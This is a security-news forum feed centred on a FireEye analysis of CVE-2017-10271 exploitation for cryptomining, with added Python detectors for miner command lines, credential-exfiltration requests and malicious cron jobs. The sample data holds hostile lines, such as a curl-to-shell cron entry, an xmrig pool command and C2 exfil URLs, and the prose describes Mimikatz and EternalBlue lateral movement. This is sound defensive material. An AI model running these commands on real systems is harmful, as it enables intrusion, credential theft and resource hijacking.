Recent messages

31
News / [AVAST]The essential guide to VPNs: What they are and how they work
« Last post by igor51 on February 16, 2018, 04:00:37 »
The essential guide to VPNs: What they are and how they work

What is a VPN connection and why are so many people talking about it? The term crops up in every conversation about the internet lately, and for good reason. While VPNs were once novel tech solutions, they are now necessary tools. At the basic level, VPNs protect your privacy online so you cannot be targeted, tracked, or discriminated against based on location.


Source: The essential guide to VPNs: What they are and how they work
32
CERTFR-2018-AVI-088: Multiple vulnerabilities in Microsoft products (14 February 2018)

Multiple vulnerabilities have been fixed in Microsoft products. They allow an attacker to cause remote code execution.

Source: CERTFR-2018-AVI-088: Multiple vulnerabilities in Microsoft products (14 February 2018)
33
CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update (http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This, coupled with the diversity of organizations potentially affected by this activity, suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim's system (Figure 1), and executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

• Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

• Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

• Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task named “Update service for Oracle products1”. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.

From this, it's quite clear that different attackers are fighting over the resources available in the system.

• Killing processes matching certain strings associated with other cryptominers

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching certain strings

Similar to the scheduled task deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

• Connects to mining pools with wallet key

Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

• Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).
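
Detection logic for the behaviours described under Tactic #2, as an added example that is not part of the FireEye post: it parses process command lines for the pool-connection flags the article lists (-o, -u, -p, -a, -k, -t) and flags scheduled-task names matching the “Update service for Oracle products…” naming from Figures 4 and 5. The telemetry records, the pool host, the wallet string and the benign 7-Zip command line are all constructed for this example; the regex that generalises the task name to one trailing character is an assumption of the example, not something the article states.

```python
import re
import shlex
from typing import Dict, List, Optional, Tuple

# Pool-connection flags as described in the FireEye write-up (-o/-u/-p/-a/-k/-t).
# Mapping them to field names is this example's choice, not the miner's own option table.
POOL_FLAGS = {"-o": "pool_url", "-u": "wallet", "-p": "password",
              "-a": "algorithm", "-k": "keepalive", "-t": "threads"}

# The two task names quoted in the article differ only in a trailing character
# ("products1" vs "productsa"); the regex generalises that (an assumption of this example).
TASK_NAME_RE = re.compile(r"^Update service for Oracle products\w?$", re.IGNORECASE)


def parse_miner_cmdline(cmdline: str) -> Optional[Dict[str, object]]:
    """Extract pool-connection flags from a process command line.

    Returns the flags found when the line carries both a pool URL (-o) and a
    wallet (-u), the combination a miner needs in order to work; otherwise None.
    """
    try:
        argv = shlex.split(cmdline, posix=False)  # non-POSIX: keep Windows backslashes
    except ValueError:                            # unbalanced quotes
        return None
    found: Dict[str, object] = {}
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok == "-k":                           # keepalive is a bare switch
            found["keepalive"] = True
        elif tok in POOL_FLAGS and i + 1 < len(argv):
            found[POOL_FLAGS[tok]] = argv[i + 1].strip('"')
            i += 1                                # skip the flag's value
        i += 1
    return found if "pool_url" in found and "wallet" in found else None


def suspicious_task_name(name: str) -> bool:
    """True when a scheduled-task name matches the naming seen in Figures 4 and 5."""
    return bool(TASK_NAME_RE.match(name.strip()))


def triage(events: List[dict]) -> List[Tuple[str, str, dict]]:
    """Run both checks over simple telemetry records.

    Each record is {'type': 'process', 'cmdline': ...} or {'type': 'task', 'name': ...}.
    """
    hits: List[Tuple[str, str, dict]] = []
    for ev in events:
        if ev["type"] == "process":
            flags = parse_miner_cmdline(ev["cmdline"])
            if flags:
                hits.append(("miner_cmdline", ev["cmdline"], flags))
        elif ev["type"] == "task" and suspicious_task_name(ev["name"]):
            hits.append(("scheduled_task", ev["name"], {}))
    return hits


# Constructed sample telemetry (not from the article): pool host and wallet are placeholders.
SAMPLE_EVENTS = [
    {"type": "process",
     "cmdline": r'C:\Windows\Temp\xmrig.exe -a cryptonight -k -o stratum+tcp://pool.example:3333 '
                r'-u WALLET_PLACEHOLDER -p x -t 2'},
    {"type": "process",
     "cmdline": r'"C:\Program Files\7-Zip\7z.exe" a -t7z backup.7z C:\Data'},  # benign: -t7z is not -t
    {"type": "task", "name": "Update service for Oracle products1"},
    {"type": "task", "name": "Oracle Database Nightly Backup"},
]

if __name__ == "__main__":
    for kind, subject, extra in triage(SAMPLE_EVENTS):
        print(kind, "|", subject, "|", extra)
```

The command-line check deliberately requires both -o and -u before it fires: -o alone appears in plenty of legitimate tools, while a pool URL together with a wallet is what the article describes as the miner's connection step and is the point at which the conclusion says FireEye HX also detects it.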


 

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim's environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144; see https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html).

The malware checks whether it's running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials, and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack (https://en.wikipedia.org/wiki/Pass_the_hash) with the NTLM information derived from Mimikatz in order to download and execute the malware on remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine whether it's vulnerable to EternalBlue, and uses it to spread to that host.

After all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.
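
A check for the credential-exfiltration request described above, as an added example rather than FireEye's code: it parses proxy-style log lines and reports GET requests to /api.php that carry a data= parameter, scoring port 8000 (the port in the article's URL pattern) as a strong match and any other port as a weak one worth a look. The log format, the client addresses, the opaque data value and the C2 address 203.0.113.10 (a documentation-range address) are all constructed for this example.

```python
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log (not from the article), one request per line:
#   <timestamp> <client> <method> <url> <status>
# 203.0.113.10 is a documentation address standing in for the C2; the data value is a made-up blob.
SAMPLE_LOG = """\
2018-02-14T10:01:03Z 10.0.0.15 GET http://203.0.113.10:8000/api.php?data=CONSTRUCTEDBLOB0123 200
2018-02-14T10:01:09Z 10.0.0.15 GET http://intranet.example/api.php?data=ping 200
2018-02-14T10:02:11Z 10.0.0.22 GET http://203.0.113.10:8000/index.html 200
2018-02-14T10:02:30Z 10.0.0.15 POST http://203.0.113.10:8000/api.php 200
"""

EXFIL_PORT = 8000          # port in the article's 'http://<C2>:8000/api.php?data=...' pattern
EXFIL_PATH = "/api.php"


def classify_request(line: str) -> Optional[Tuple[str, Dict[str, object]]]:
    """Return ('strong' | 'weak', details) when a log line matches the exfil pattern, else None.

    strong: GET to <host>:8000/api.php with a data= parameter (exactly the article's shape).
    weak:   same path and parameter on any other port (pattern may be reused with another port).
    """
    parts = line.split()
    if len(parts) != 5:
        return None                      # malformed line; a real parser would log this
    ts, client, method, url, _status = parts
    if method != "GET":
        return None
    u = urlsplit(url)
    if not u.path.lower().endswith(EXFIL_PATH):
        return None
    params = parse_qs(u.query, keep_blank_values=True)
    if "data" not in params:
        return None
    payload = params["data"][0]
    details: Dict[str, object] = {
        "time": ts, "client": client, "host": u.hostname,
        "port": u.port, "data_len": len(payload),
    }
    level = "strong" if u.port == EXFIL_PORT else "weak"
    return level, details


def scan_log(text: str) -> Dict[str, List[Dict[str, object]]]:
    """Group matching requests by confidence level."""
    hits: Dict[str, List[Dict[str, object]]] = {"strong": [], "weak": []}
    for line in text.splitlines():
        result = classify_request(line)
        if result:
            hits[result[0]].append(result[1])
    return hits


if __name__ == "__main__":
    for level, entries in scan_log(SAMPLE_LOG).items():
        for e in entries:
            print(level, e)
```

Because the article describes credentials leaving in a GET query string, the length of the data value is recorded as well: a long value on an otherwise quiet internal client is the detail an analyst would pivot on when deciding whether the host needs credential rotation.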


 

Tactic #4: Scenarios observed in Linux OS

We've also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

• Attempts to kill already running cryptominers

Figure 11: Terminating processes matching certain strings

• Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

• Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

• Tries to kill other potential miners to hog the CPU usage

Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.
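
An added example (not from the article) for the Linux persistence described above: it parses a crontab and flags entries that fetch remote content and pipe it into a shell, execute from a world-writable temp directory, or carry miner-style pool arguments. The crontab, the download host (again the documentation address 203.0.113.10), the file name borrowed from the article's IoC list and the wallet placeholder are constructed; the three heuristics are this example's own choices and will need tuning for a real fleet.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed crontab (not from the article): two ordinary jobs and two miner-style ones.
# The downloaded file name echoes the article's IoC list; host and wallet are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/10 * * * * curl -fsSL http://203.0.113.10/lower.css | sh
*/5 * * * * /tmp/.X11-unix/xmrig -o stratum+tcp://pool.example:3333 -u WALLET_PLACEHOLDER
@reboot /usr/sbin/ntpd -g
"""

# curl/wget followed (in the same command, before any pipe/separator) by an http(s) URL
FETCH_RE = re.compile(r"\b(curl|wget)\b[^|;&]*https?://")
# output piped straight into a shell interpreter
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sudo\s+)?(ba|da|z|k)?sh\b")
# program path under a world-writable directory
TMP_EXEC_RE = re.compile(r"(^|\s)(/tmp|/var/tmp|/dev/shm)/\S+")


def split_cron_line(line: str) -> Optional[Tuple[str, str]]:
    """Split a crontab line into (schedule, command); None for blank, comment or VAR=value lines."""
    s = line.strip()
    if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
        return None
    if s.startswith("@"):                       # @reboot, @daily, ...
        sched, _, cmd = s.partition(" ")
        return sched, cmd.strip()
    fields = s.split(None, 5)                   # five schedule fields, rest is the command
    if len(fields) < 6:
        return None
    return " ".join(fields[:5]), fields[5]


def assess_cron_entry(command: str) -> List[str]:
    """Return the reasons a cron command looks like miner persistence (empty list if none)."""
    reasons: List[str] = []
    if FETCH_RE.search(command) and PIPE_TO_SHELL_RE.search(command):
        reasons.append("downloads remote content and pipes it to a shell")
    if TMP_EXEC_RE.search(command):
        reasons.append("executes from a world-writable temp directory")
    if "stratum" in command or (" -o " in command and " -u " in command):
        reasons.append("miner-style pool/wallet arguments")
    return reasons


def scan_crontab(text: str) -> List[Dict[str, object]]:
    """Evaluate every entry of a crontab and collect the suspicious ones with line numbers."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = split_cron_line(line)
        if not parsed:
            continue
        sched, cmd = parsed
        reasons = assess_cron_entry(cmd)
        if reasons:
            findings.append({"line": lineno, "schedule": sched, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']} [{f['schedule']}]: {f['command']}")
        for r in f["reasons"]:
            print("   -", r)
```

Run it over the output of `crontab -l` for each user, plus the files under /etc/cron.d, rather than over a single crontab; the script in Figure 13 would have written to whichever of those the compromised WebLogic account could reach. A legitimate job that fetches and executes remote code will also trip the first heuristic, which is the right outcome: that pattern deserves review regardless of who wrote it.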


 

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We've observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name
POWERSHELL DOWNLOADER (METHODOLOGY)
MONERO MINER (METHODOLOGY)
MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

Name                     MD5
cranberry.exe/logic.exe  3421A769308D39D4E9C7E8CAECAF7FC4
xmrig.exe/yam.exe        B3A831BFA590274902C77B6C7D4C31AE
1.ps1                    26404FEDE71F3F713175A3A3CEBC619B
2.ps1                    D3D10FAA69A10AC754E3B7DDE9178C22
info3.ps1                9C91B5CF6ECED54ABB82D1050C5893F2
info6.ps1                3AAD3FABF29F9DF65DCBD0F308FF0FA8
lower.css                933633F2ACFC5909C83F5C73B6FC97CC
lib.css                  B47DAF937897043745DF81F32B9D7565
bootstrap.css            3542AC729035C0F3DB186DDF2178B6A0

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Source: CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining
35
News / [kreb]New EU Privacy Law May Weaken Security
« Last post by igor51 on February 15, 2018, 19:00:06 »
New EU Privacy Law May Weaken Security

Companies around the globe are scrambling to comply with new European privacy regulations that take effect a little more than three months from now. But many security experts are worried that the changes being ushered in by the rush to adhere to the law may make it more difficult to track down cybercriminals and less likely that organizations will be willing to share data about new online threats.

On May 25, 2018, the General Data Protection Regulation (GDPR) takes effect. The law, enacted by the European Parliament, requires technology companies to get affirmative consent for any information they collect on people within the European Union. Organizations that violate the GDPR could face fines of up to four percent of global annual revenues.
Source: New EU Privacy Law May Weaken Security
36
News / [Sophos]Coinmining frenzy is making it hard for us to find aliens
« Last post by igor51 on February 15, 2018, 17:00:08 »
Coinmining frenzy is making it hard for us to find aliens

As cryptocurrency values have soared, so too has the cost of the hardware needed to mine them - if you can even buy the GPUs, given the shortages.
Source: Coinmining frenzy is making it hard for us to find aliens
37
CERTFR-2018-AVI-087: Multiple vulnerabilities in Microsoft Windows (14 February 2018)

Multiple vulnerabilities have been fixed in Microsoft Windows. They allow an attacker to cause a denial of service, information disclosure, privilege escalation, a security feature bypass and an execution …
Source: CERTFR-2018-AVI-087: Multiple vulnerabilities in Microsoft Windows (14 February 2018)

38
News / [Eset]Concerns about data breaches hitting all-time high
« Last post by igor51 on February 15, 2018, 15:00:16 »
Concerns about data breaches hitting all-time high

A record-high proportion of organizations worldwide (67%) said that they had been breached at some point, up from 56% in the report’s previous edition.

Source: Concerns about data breaches hitting all-time high
39
News / [Trend]Vulnerabilities in Apache CouchDB Open the Door to Monero Miners
« Last post by igor51 on February 15, 2018, 15:00:15 »
Vulnerabilities in Apache CouchDB Open the Door to Monero Miners

Based on data from our sensors that we deployed worldwide, we have observed a new attack that exploits two vulnerabilities in a popular database system to deliver miners (detected by Trend Micro as HKTL_COINMINE.GE, HKTL_COINMINE.GP, and HKTL_COINMINE.GQ) for the Monero cryptocurrency.


Post from: Trendlabs Security Intelligence Blog - by Trend Micro




Source: Vulnerabilities in Apache CouchDB Open the Door to Monero Miners
40
CERTFR-2018-AVI-086: Multiple vulnerabilities in Microsoft Office (14 February 2018)

Multiple vulnerabilities have been fixed in Microsoft Office. They allow
